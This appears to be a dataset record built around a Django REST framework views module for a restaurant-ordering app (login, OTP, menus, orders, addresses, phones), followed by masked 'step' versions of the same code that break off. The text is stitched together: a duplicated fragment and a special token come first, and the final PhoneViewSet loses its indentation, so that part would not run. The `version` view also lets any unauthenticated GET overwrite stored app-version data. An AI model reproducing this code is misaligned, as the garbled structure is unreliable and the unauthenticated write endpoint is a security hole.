    def set_default(self, request, *args, **kwargs):
        """Mark this phone as the default and unset the user's other phones."""
        instance = self.get_object()
        instance.default = True
        instance.save()
        self.get_queryset().filter(~Q(pk=instance.pk),
                                   user=request.user).update(default=False)
        return Response(self.get_serializer(instance).data)

    def get_queryset(self):
        # BUG FIX: the original called self.get_queryset() here, recursing
        # forever (RecursionError on any request). Delegate to the parent's
        # queryset, then restrict to the requesting user's phones.
        return super(PhoneViewSet, self).get_queryset().filter(user=self.request.user)
<|reserved_special_token_1|>
from django.db.models import Q, Avg
from django.http import JsonResponse
from rest_framework import permissions
from rest_framework.authtoken.models import Token
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.viewsets import ModelViewSet
from base_backend import permissions as my_perms
from base_backend.utils import RequestDataFixer
from restaurants.models import User, Cuisine, MealType, AppVersion, RestaurantType, Restaurant, Menu, Order, OrderLine, \
Wilaya, City, Address, Phone
from restaurants.serializers import UserSerializer, SmsConfirmationSerializer, CuisineSerializer, \
RestaurantTypeSerializer, RestaurantSerializer, MenuSerializer, OrderLineSerializer, WilayaSerializer, \
CitySerializer, OrderWRestaurantSerializer, MealTypesWithMenuSerializer, MealTypeSerializer, OrderSerializer, \
AddressSerializer, PhoneSerializer
class LoginApi(ObtainAuthToken):
    """Token login that returns the token plus a profile snapshot."""

    def post(self, request, *args, **kwargs):
        """Validate credentials, create/fetch the token, return user details."""
        serializer = self.serializer_class(data=request.data,
                                           context=dict(request=request))
        serializer.is_valid(raise_exception=True)
        user = serializer.validated_data['user']
        token, _ = Token.objects.get_or_create(user=user)
        payload = dict(
            token=token.key,
            user_id=user.pk,
            phone=user.phone,
            email=user.email,
            type=user.user_type,
            photo=user.photo.url if user.photo else None,
            address=user.address,
            city=user.lives_in_id,
            birth_date=user.birth_date,
            username=user.username,
        )
        return Response(payload)
class UserViewSet(ModelViewSet):
    """Active users; registration is open, other actions need authentication."""
    serializer_class = UserSerializer
    queryset = User.objects.filter(is_active=True)

    def get_permissions(self):
        # Anyone may sign up; every other action uses the read-or-auth policy.
        if self.action in ('create', 'register'):
            return [permissions.AllowAny()]
        return [permissions.IsAuthenticatedOrReadOnly()]

    # BUG FIX: permission_classes must contain permission *classes* (DRF
    # instantiates each entry); the original passed an AllowAny() instance.
    @action(methods=['post'], detail=False, url_path='register',
            permission_classes=[permissions.AllowAny])
    def register(self, request, *args, **kwargs):
        """Create the user, then collapse the response body to a status flag."""
        response = super().create(request, *args, **kwargs)
        if response:
            response.data = dict(status=True, code=4)
        return response

    def create(self, request, *args, **kwargs):
        # POST /users/ behaves exactly like /users/register/.
        return self.register(request, *args, **kwargs)
class OtpApi(APIView):
    """Resend (GET) or verify (PUT) the SMS confirmation code."""
    permission_classes = [permissions.AllowAny]

    def get(self, request):
        # Re-send the one-time code to the number given in the query string.
        ok = SmsConfirmationSerializer(data=request.GET).resend()
        if ok:
            return Response(dict(status=True, code=5))
        return Response(dict(status=False, code=21))

    def put(self, request):
        # Validate the submitted code and activate the account.
        ok = SmsConfirmationSerializer(data=request.data).activate()
        if ok:
            return Response(dict(status=True, code=5))
        return Response(dict(status=False, code=20))
class CuisineViewSet(ModelViewSet):
    """Plain CRUD over cuisines; writes restricted to admins."""
    queryset = Cuisine.objects.all()
    serializer_class = CuisineSerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
class MealTypeViewSet(ModelViewSet):
    """Meal types, with an endpoint listing a restaurant's types with menus."""
    permission_classes = [my_perms.IsAdminOrReadOnly]
    serializer_class = MealTypeSerializer
    queryset = MealType.objects.all()

    def get_serializer(self, *args, **kwargs):
        # The grouped endpoint needs the serializer that nests menus.
        if self.action != 'get_types_with_menus':
            return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)
        kwargs['context'] = self.get_serializer_context()
        return MealTypesWithMenuSerializer(*args, **kwargs)

    @action(['get'], detail=False, url_path='type-with-menus')
    def get_types_with_menus(self, request, *args, **kwargs):
        """Meal types having menus offered by ?restaurant=<id> (0 if absent)."""
        restaurant_id = request.query_params.get('restaurant', 0)
        matching = self.get_queryset().filter(menus__offered_by=restaurant_id)
        return Response(self.get_serializer(matching, many=True).data)
class RestaurantTypeViewSet(ModelViewSet):
    """Plain CRUD over restaurant types; writes restricted to admins."""
    queryset = RestaurantType.objects.all()
    serializer_class = RestaurantTypeSerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
class RestaurantViewSet(ModelViewSet):
    """Restaurants plus home / recommended / special-offer listings."""
    serializer_class = RestaurantSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Restaurant.objects.all()

    def _get_recommended_restaurants(self):
        """All restaurants annotated with their average star rating (rates_avg)."""
        # NOTE: dropped the original's bogus `-> queryset` annotation, which
        # pointed at the class-attribute queryset instance, not a type.
        return self.get_queryset().annotate(rates_avg=Avg('rates__stars'))

    def _get_special_restaurants(self):
        """Restaurants with a discounted menu or an active special day.

        BUG FIX: filtering across the multi-valued ``menus`` relation yields
        one row per matching menu, so the original returned duplicate
        restaurants; ``distinct()`` collapses them.
        """
        special = self.get_queryset().filter(
            Q(menus__discount__gt=0) | Q(on_special_day=True))
        return special.distinct()

    @action(['get'], detail=False, url_path='get-home')
    def home(self, request, *args, **kwargs):
        """Five random picks from each of: recommended, special, all."""
        recommended = self._get_recommended_restaurants().order_by('?')[:5]
        special = self._get_special_restaurants().order_by('?')[:5]
        everything = self.get_queryset().order_by('?')[:5]
        return Response({
            'recommended': self.get_serializer(recommended, many=True).data,
            'special': self.get_serializer(special, many=True).data,
            'all': self.get_serializer(everything, many=True).data,
        })

    @action(['get'], detail=False, url_path='special-offers')
    def special_offers(self, request, *args, **kwargs):
        """Special-offer restaurants, newest first."""
        qs = self._get_special_restaurants().order_by('-created_at')
        return Response(self.get_serializer(qs, many=True).data)

    @action(['get'], detail=False, url_path='recommended-offers')
    def recommended_offers(self, request, *args, **kwargs):
        """Restaurants ordered by average rating, best first."""
        qs = self._get_recommended_restaurants().order_by('-rates_avg')
        return Response(self.get_serializer(qs, many=True).data)

    @action(['get'], detail=True, url_path='restaurant-menus')
    def get_restaurant_menus(self, request, *args, **kwargs):
        """This restaurant's menus grouped by meal type."""
        grouped = Menu.objects.grouped_by_meal_type_for_a_restaurant(
            restaurant_id=self.kwargs.get('pk'))
        return Response(grouped)
class MenuViewSet(ModelViewSet):
    """Menus plus home / special / recommended listings."""
    serializer_class = MenuSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Menu.objects.all()

    @action(['get'], detail=False, url_path='get-home')
    def home(self, request, *args, **kwargs):
        """Five random discounted menus and five random menus overall."""
        qs = self.get_queryset()
        discounted = qs.filter(~Q(discount=0)).order_by('?')[:5]
        picks = qs.all().order_by('?')[:5]
        payload = {
            'recommended': self.get_serializer(picks, many=True).data,
            'special_offers': self.get_serializer(discounted, many=True).data,
        }
        return Response(data=payload)

    @action(['get'], detail=False, url_path='special-offers')
    def special_offers(self, request, *args, **kwargs):
        """Discounted menus, newest first."""
        discounted = self.get_queryset().filter(~Q(discount=0)).order_by('-created_at')
        return Response(self.get_serializer(discounted, many=True).data)

    @action(['get'], detail=False, url_path='recommended-offers')
    def recommended_offers(self, request, *args, **kwargs):
        """All menus, newest first."""
        newest = self.get_queryset().all().order_by('-created_at')
        return Response(self.get_serializer(newest, many=True).data)
class OrderViewSet(ModelViewSet):
    """Orders of the authenticated client, newest first."""
    serializer_class = OrderWRestaurantSerializer
    permission_classes = [permissions.IsAuthenticated]
    queryset = Order.objects.all().order_by('-created_at')

    def get_serializer(self, *args, **kwargs):
        # Creation takes the plain serializer; reads embed restaurant data.
        if self.action == 'create':
            return OrderSerializer(*args, **kwargs)
        return super(OrderViewSet, self).get_serializer(*args, **kwargs)

    def get_queryset(self):
        # Only the requesting client's own orders.
        base = super(OrderViewSet, self).get_queryset()
        return base.filter(client=self.request.user.client)

    def create(self, request, *args, **kwargs):
        # Normalize the incoming payload before delegating to DRF's create.
        fixed = RequestDataFixer(request=request)
        return super(OrderViewSet, self).create(fixed, *args, **kwargs)
class OrderLineViewSet(ModelViewSet):
    """Plain CRUD over individual order lines."""
    queryset = OrderLine.objects.all()
    serializer_class = OrderLineSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
class WilayaViewSet(ModelViewSet):
    """Plain CRUD over wilayas; writes restricted to admins."""
    queryset = Wilaya.objects.all()
    serializer_class = WilayaSerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
class CityViewSet(ModelViewSet):
    """Plain CRUD over cities; writes restricted to admins."""
    queryset = City.objects.all()
    serializer_class = CitySerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
def version(request):
    """Read or update the stored application version code.

    GET with ``?code=X`` updates every AppVersion row to X and returns
    ``{"updated": true}``; a plain GET returns ``{"code": <current>}``.
    """
    # BUG FIXES: removed leftover debug print; the original crashed with
    # AttributeError on `.first().code` when no AppVersion row exists.
    code = request.GET.get('code', None)
    if code:
        AppVersion.objects.all().update(code=code)
        return JsonResponse({'updated': True})
    current = AppVersion.objects.all().first()
    return JsonResponse({'code': current.code if current else None})
class AddressViewSet(ModelViewSet):
    """CRUD for the authenticated client's addresses plus default management."""
    serializer_class = AddressSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Address.objects.all()

    @action(['PUT'], detail=True, url_path='set-default', url_name='set-default')
    def set_default(self, request, *args, **kwargs):
        """Flag this address as the default and unset the client's others."""
        address = self.get_object()
        address.default = True
        address.save()
        others = self.get_queryset().filter(~Q(pk=address.pk),
                                            belongs_to=request.user.client)
        others.update(default=False)
        return Response(self.get_serializer(address).data)

    @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
    def set_main(self, request, *args, **kwargs):
        """Clear the default flag on every address owned by the client."""
        self.get_queryset().filter(belongs_to=request.user.client).update(default=False)
        return Response({'status': True})

    def get_queryset(self):
        # Restrict to the requesting client's own addresses.
        base = super(AddressViewSet, self).get_queryset()
        return base.filter(belongs_to=self.request.user.client)
class PhoneViewSet(ModelViewSet):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
serializer_class = PhoneSerializer
queryset = Phone.objects.all()
@action(['PUT'], detail=False, url_path="set-main", url_name='set-main')
def set_main(self, request, *args, **kwargs):
self.get_queryset().filter(user=request.user).update(default=False)
return Response({"status": True})
@action(['PUT'], detail=True, url_path="set-default", url_name='set-default')
def set_default(self, request, *args, **kwargs):
instance = self.get_object()
instance.default = True
instance.save()
self.get_queryset().filter(~Q(pk=instance.pk), user=request.user).update(default=False)
return Response(self.get_serializer(instance).data)
def get_queryset(self):
    """Restrict the queryset to phones owned by the requesting user.

    Bug fix: the original body called ``self.get_queryset()``, which
    recurses into this very method and raises ``RecursionError`` on every
    request. Delegate to the parent class to obtain the base queryset,
    matching the pattern used by the other viewsets in this file.
    """
    return super().get_queryset().filter(user=self.request.user)
|
flexible
|
{
"blob_id": "9e8b5cebd48b3b98e421c896d9835ada5ec4166e",
"index": 2740,
"step-1": "<mask token>\n\n\nclass RestaurantViewSet(ModelViewSet):\n serializer_class = RestaurantSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Restaurant.objects.all()\n\n def _get_recommended_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))\n return recommended\n\n def _get_special_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n special_offers_restaurants = queryset.filter(Q(menus__discount__gt=\n 0) | Q(on_special_day=True))\n return special_offers_restaurants\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n recommended = self._get_recommended_restaurants().order_by('?')[:5]\n special = self._get_special_restaurants().order_by('?')[:5]\n all_restaurants = self.get_queryset().order_by('?')[:5]\n recommended = self.get_serializer(recommended, many=True).data\n special = self.get_serializer(special, many=True).data\n all_restaurants = self.get_serializer(all_restaurants, many=True).data\n response = {'recommended': recommended, 'special': special, 'all':\n all_restaurants}\n return Response(response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_special_restaurants().\n order_by('-created_at'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_recommended_restaurants(\n ).order_by('-rates_avg'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=True, url_path='restaurant-menus')\n def get_restaurant_menus(self, request, *args, **kwargs):\n categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(\n restaurant_id=self.kwargs.get('pk'))\n return 
Response(categorized_menus)\n\n\nclass MenuViewSet(ModelViewSet):\n serializer_class = MenuSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Menu.objects.all()\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]\n recommended = queryset.all().order_by('?')[:5]\n special_offers = self.get_serializer(special_offers, many=True).data\n recommended = self.get_serializer(recommended, many=True).data\n response = {'recommended': recommended, 'special_offers':\n special_offers}\n return Response(data=response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at'\n )\n serializer = self.get_serializer(special_offers, many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n recommended = queryset.all().order_by('-created_at')\n serializer = self.get_serializer(recommended, many=True)\n return Response(serializer.data)\n\n\nclass OrderViewSet(ModelViewSet):\n serializer_class = OrderWRestaurantSerializer\n permission_classes = [permissions.IsAuthenticated]\n queryset = Order.objects.all().order_by('-created_at')\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'create':\n return OrderSerializer(*args, **kwargs)\n return super(OrderViewSet, self).get_serializer(*args, **kwargs)\n\n def get_queryset(self):\n return super(OrderViewSet, self).get_queryset().filter(client=self.\n request.user.client)\n\n def create(self, request, *args, **kwargs):\n fixer = RequestDataFixer(request=request)\n return super(OrderViewSet, self).create(fixer, *args, **kwargs)\n\n\nclass 
OrderLineViewSet(ModelViewSet):\n serializer_class = OrderLineSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = OrderLine.objects.all()\n\n\nclass WilayaViewSet(ModelViewSet):\n serializer_class = WilayaSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Wilaya.objects.all()\n\n\nclass CityViewSet(ModelViewSet):\n serializer_class = CitySerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = City.objects.all()\n\n\n<mask token>\n\n\nclass AddressViewSet(ModelViewSet):\n serializer_class = AddressSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Address.objects.all()\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.\n user.client).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(belongs_to=request.user.client).update(\n default=False)\n return Response({'status': True})\n\n def get_queryset(self):\n return super(AddressViewSet, self).get_queryset().filter(belongs_to\n =self.request.user.client)\n\n\nclass PhoneViewSet(ModelViewSet):\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n serializer_class = PhoneSerializer\n queryset = Phone.objects.all()\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(user=request.user).update(default=False)\n return Response({'status': True})\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = 
self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), user=request.user\n ).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n def get_queryset(self):\n return self.get_queryset().filter(user=self.request.user)\n",
"step-2": "<mask token>\n\n\nclass MealTypeViewSet(ModelViewSet):\n permission_classes = [my_perms.IsAdminOrReadOnly]\n serializer_class = MealTypeSerializer\n queryset = MealType.objects.all()\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'get_types_with_menus':\n serializer_class = MealTypesWithMenuSerializer\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs)\n return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)\n\n @action(['get'], detail=False, url_path='type-with-menus')\n def get_types_with_menus(self, request, *args, **kwargs):\n types = self.get_queryset().filter(menus__offered_by=request.\n query_params.get('restaurant', 0))\n types = self.get_serializer(types, many=True).data\n return Response(types)\n\n\nclass RestaurantTypeViewSet(ModelViewSet):\n serializer_class = RestaurantTypeSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = RestaurantType.objects.all()\n\n\nclass RestaurantViewSet(ModelViewSet):\n serializer_class = RestaurantSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Restaurant.objects.all()\n\n def _get_recommended_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))\n return recommended\n\n def _get_special_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n special_offers_restaurants = queryset.filter(Q(menus__discount__gt=\n 0) | Q(on_special_day=True))\n return special_offers_restaurants\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n recommended = self._get_recommended_restaurants().order_by('?')[:5]\n special = self._get_special_restaurants().order_by('?')[:5]\n all_restaurants = self.get_queryset().order_by('?')[:5]\n recommended = self.get_serializer(recommended, many=True).data\n special = self.get_serializer(special, many=True).data\n 
all_restaurants = self.get_serializer(all_restaurants, many=True).data\n response = {'recommended': recommended, 'special': special, 'all':\n all_restaurants}\n return Response(response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_special_restaurants().\n order_by('-created_at'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_recommended_restaurants(\n ).order_by('-rates_avg'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=True, url_path='restaurant-menus')\n def get_restaurant_menus(self, request, *args, **kwargs):\n categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(\n restaurant_id=self.kwargs.get('pk'))\n return Response(categorized_menus)\n\n\nclass MenuViewSet(ModelViewSet):\n serializer_class = MenuSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Menu.objects.all()\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]\n recommended = queryset.all().order_by('?')[:5]\n special_offers = self.get_serializer(special_offers, many=True).data\n recommended = self.get_serializer(recommended, many=True).data\n response = {'recommended': recommended, 'special_offers':\n special_offers}\n return Response(data=response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at'\n )\n serializer = self.get_serializer(special_offers, many=True)\n return Response(serializer.data)\n\n @action(['get'], 
detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n recommended = queryset.all().order_by('-created_at')\n serializer = self.get_serializer(recommended, many=True)\n return Response(serializer.data)\n\n\nclass OrderViewSet(ModelViewSet):\n serializer_class = OrderWRestaurantSerializer\n permission_classes = [permissions.IsAuthenticated]\n queryset = Order.objects.all().order_by('-created_at')\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'create':\n return OrderSerializer(*args, **kwargs)\n return super(OrderViewSet, self).get_serializer(*args, **kwargs)\n\n def get_queryset(self):\n return super(OrderViewSet, self).get_queryset().filter(client=self.\n request.user.client)\n\n def create(self, request, *args, **kwargs):\n fixer = RequestDataFixer(request=request)\n return super(OrderViewSet, self).create(fixer, *args, **kwargs)\n\n\nclass OrderLineViewSet(ModelViewSet):\n serializer_class = OrderLineSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = OrderLine.objects.all()\n\n\nclass WilayaViewSet(ModelViewSet):\n serializer_class = WilayaSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Wilaya.objects.all()\n\n\nclass CityViewSet(ModelViewSet):\n serializer_class = CitySerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = City.objects.all()\n\n\n<mask token>\n\n\nclass AddressViewSet(ModelViewSet):\n serializer_class = AddressSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Address.objects.all()\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.\n user.client).update(default=False)\n return 
Response(self.get_serializer(instance).data)\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(belongs_to=request.user.client).update(\n default=False)\n return Response({'status': True})\n\n def get_queryset(self):\n return super(AddressViewSet, self).get_queryset().filter(belongs_to\n =self.request.user.client)\n\n\nclass PhoneViewSet(ModelViewSet):\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n serializer_class = PhoneSerializer\n queryset = Phone.objects.all()\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(user=request.user).update(default=False)\n return Response({'status': True})\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), user=request.user\n ).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n def get_queryset(self):\n return self.get_queryset().filter(user=self.request.user)\n",
"step-3": "<mask token>\n\n\nclass CuisineViewSet(ModelViewSet):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MealTypeViewSet(ModelViewSet):\n permission_classes = [my_perms.IsAdminOrReadOnly]\n serializer_class = MealTypeSerializer\n queryset = MealType.objects.all()\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'get_types_with_menus':\n serializer_class = MealTypesWithMenuSerializer\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs)\n return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)\n\n @action(['get'], detail=False, url_path='type-with-menus')\n def get_types_with_menus(self, request, *args, **kwargs):\n types = self.get_queryset().filter(menus__offered_by=request.\n query_params.get('restaurant', 0))\n types = self.get_serializer(types, many=True).data\n return Response(types)\n\n\nclass RestaurantTypeViewSet(ModelViewSet):\n serializer_class = RestaurantTypeSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = RestaurantType.objects.all()\n\n\nclass RestaurantViewSet(ModelViewSet):\n serializer_class = RestaurantSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Restaurant.objects.all()\n\n def _get_recommended_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))\n return recommended\n\n def _get_special_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n special_offers_restaurants = queryset.filter(Q(menus__discount__gt=\n 0) | Q(on_special_day=True))\n return special_offers_restaurants\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n recommended = self._get_recommended_restaurants().order_by('?')[:5]\n special = self._get_special_restaurants().order_by('?')[:5]\n all_restaurants = self.get_queryset().order_by('?')[:5]\n recommended = 
self.get_serializer(recommended, many=True).data\n special = self.get_serializer(special, many=True).data\n all_restaurants = self.get_serializer(all_restaurants, many=True).data\n response = {'recommended': recommended, 'special': special, 'all':\n all_restaurants}\n return Response(response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_special_restaurants().\n order_by('-created_at'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_recommended_restaurants(\n ).order_by('-rates_avg'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=True, url_path='restaurant-menus')\n def get_restaurant_menus(self, request, *args, **kwargs):\n categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(\n restaurant_id=self.kwargs.get('pk'))\n return Response(categorized_menus)\n\n\nclass MenuViewSet(ModelViewSet):\n serializer_class = MenuSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Menu.objects.all()\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]\n recommended = queryset.all().order_by('?')[:5]\n special_offers = self.get_serializer(special_offers, many=True).data\n recommended = self.get_serializer(recommended, many=True).data\n response = {'recommended': recommended, 'special_offers':\n special_offers}\n return Response(data=response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at'\n )\n serializer 
= self.get_serializer(special_offers, many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n recommended = queryset.all().order_by('-created_at')\n serializer = self.get_serializer(recommended, many=True)\n return Response(serializer.data)\n\n\nclass OrderViewSet(ModelViewSet):\n serializer_class = OrderWRestaurantSerializer\n permission_classes = [permissions.IsAuthenticated]\n queryset = Order.objects.all().order_by('-created_at')\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'create':\n return OrderSerializer(*args, **kwargs)\n return super(OrderViewSet, self).get_serializer(*args, **kwargs)\n\n def get_queryset(self):\n return super(OrderViewSet, self).get_queryset().filter(client=self.\n request.user.client)\n\n def create(self, request, *args, **kwargs):\n fixer = RequestDataFixer(request=request)\n return super(OrderViewSet, self).create(fixer, *args, **kwargs)\n\n\nclass OrderLineViewSet(ModelViewSet):\n serializer_class = OrderLineSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = OrderLine.objects.all()\n\n\nclass WilayaViewSet(ModelViewSet):\n serializer_class = WilayaSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Wilaya.objects.all()\n\n\nclass CityViewSet(ModelViewSet):\n serializer_class = CitySerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = City.objects.all()\n\n\n<mask token>\n\n\nclass AddressViewSet(ModelViewSet):\n serializer_class = AddressSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Address.objects.all()\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n 
self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.\n user.client).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(belongs_to=request.user.client).update(\n default=False)\n return Response({'status': True})\n\n def get_queryset(self):\n return super(AddressViewSet, self).get_queryset().filter(belongs_to\n =self.request.user.client)\n\n\nclass PhoneViewSet(ModelViewSet):\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n serializer_class = PhoneSerializer\n queryset = Phone.objects.all()\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(user=request.user).update(default=False)\n return Response({'status': True})\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), user=request.user\n ).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n def get_queryset(self):\n return self.get_queryset().filter(user=self.request.user)\n",
